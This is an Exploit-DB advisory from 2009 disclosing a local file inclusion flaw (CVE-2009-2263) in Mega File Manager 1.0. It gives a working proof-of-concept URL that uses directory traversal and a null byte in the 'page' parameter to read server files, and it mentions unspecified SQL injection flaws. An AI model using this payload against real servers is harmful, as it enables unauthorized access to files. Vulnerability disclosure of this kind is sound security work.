Mega File Manager 1.0 index.php page LFI Vulnerability

2009-06-26T00:00:00
ID EDB-ID:9025
Type exploitdb
Reporter SirGod
Modified 2009-06-26T00:00:00

Description

Mega File Manager 1.0 (index.php page) LFI Vulnerability. CVE-2009-2263. Webapps exploit for php platform

                                        
                                            #################################################################################################################
[+] Mega File Manager 1.0 (index.php page) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] http://insecurity-ro.org
#################################################################################################################

[+] Homepage : http://www.awesomephp.com/?MegaFileManager

[+] Note : The script is full of SQL Injection vulns,but I am tired to
make querys now.

[+] Local File Inclusion

    http://127.0.0.1/[path]/index.php?page=../../../../../../BOOTSECT.BAK%00

#################################################################################################################

# milw0rm.com [2009-06-26]